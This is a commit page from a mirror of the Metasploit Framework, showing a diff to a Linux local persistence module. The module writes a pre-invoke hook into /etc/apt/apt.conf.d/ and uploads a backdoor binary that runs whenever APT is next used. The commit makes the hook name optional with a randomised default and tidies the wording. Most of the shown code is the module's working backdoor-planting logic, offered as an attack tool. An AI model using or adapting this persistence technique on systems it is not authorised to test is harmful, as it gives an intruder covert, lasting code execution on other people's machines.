infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Dont require hook name

master
Jacob Robles 2019-04-26 13:11:40 -05:00
parent c643436383
commit 1faa41aafe
No known key found for this signature in database
GPG Key ID: 3EC9F18F2B12401C
1 changed files with 7 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
modules/exploits/linux/local/apt_package_manager_persistence.rb
View File

@ -16,8 +16,8 @@ class MetasploitModule < Msf::Exploit::Local
'Description' => %q( 'Description' => %q(
This module will run a payload when the package manager is used. No This module will run a payload when the package manager is used. No
handler is ran automatically so you must configure an appropriate handler is ran automatically so you must configure an appropriate
exploit/multi/handler to connect. Module creates a pre-invoke hook exploit/multi/handler to connect. This module creates a pre-invoke hook
for APT in apt.conf.d. The Hook name syntax is numeric followed by text. for APT in apt.conf.d. The hook name syntax is numeric followed by text.
), ),
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => ['Aaron Ringo'], 'Author' => ['Aaron Ringo'],
@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Local
], ],
'SessionTypes' => ['shell', 'meterpreter'], 'SessionTypes' => ['shell', 'meterpreter'],
'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' }, 'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },
'DisclosureDate' => '1999-03-09', # Date Apt package manager was included in Debian 'DisclosureDate' => '1999-03-09', # Date APT package manager was included in Debian
'References' => ['URL', 'https://unix.stackexchange.com/questions/204414/how-to-run-a-command-before-download-with-apt-get'], 'References' => ['URL', 'https://unix.stackexchange.com/questions/204414/how-to-run-a-command-before-download-with-apt-get'],
'Targets' => [['Automatic', {}]], 'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0 'DefaultTarget' => 0
@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Local
register_options( register_options(
[ [
OptString.new('HOOKNAME', [true, 'Name of hook file to write', '05new-hook']), OptString.new('HOOKNAME', [false, 'Name of hook file to write']),
OptString.new('BACKDOOR_NAME', [false, 'Name of binary to write']) OptString.new('BACKDOOR_NAME', [false, 'Name of binary to write'])
]) ])
@ -56,9 +56,9 @@ class MetasploitModule < Msf::Exploit::Local
def exploit def exploit
hook_path = '/etc/apt/apt.conf.d/' hook_path = '/etc/apt/apt.conf.d/'
unless writable? hook_path unless writable? hook_path
fail_with Failure::BadConfig, "#{hook_path} not writable, or apt is not on system" fail_with Failure::BadConfig, "#{hook_path} not writable, or APT is not on system"
end end
hook_path << datastore['HOOKNAME'] hook_path << (datastore['HOOKNAME'] || "#{rand_text_numeric(2)}#{rand_text_alpha(5..8)}")
backdoor_path = datastore['WritableDir'] backdoor_path = datastore['WritableDir']
unless writable? backdoor_path unless writable? backdoor_path
@ -86,10 +86,9 @@ class MetasploitModule < Msf::Exploit::Local
fail_with Failure::Unknown, "Failed to write #{backdoor_path}" fail_with Failure::Unknown, "Failed to write #{backdoor_path}"
end end
print_status("Backdoor uploaded #{backdoor_path}") print_status("Backdoor uploaded #{backdoor_path}")
print_status('Backdoor will run on next Apt update') print_status('Backdoor will run on next APT update')
# permissions chosen to reflect common perms in /usr/local/bin/ # permissions chosen to reflect common perms in /usr/local/bin/
chmod(backdoor_path, 0755) chmod(backdoor_path, 0755)
end end
end end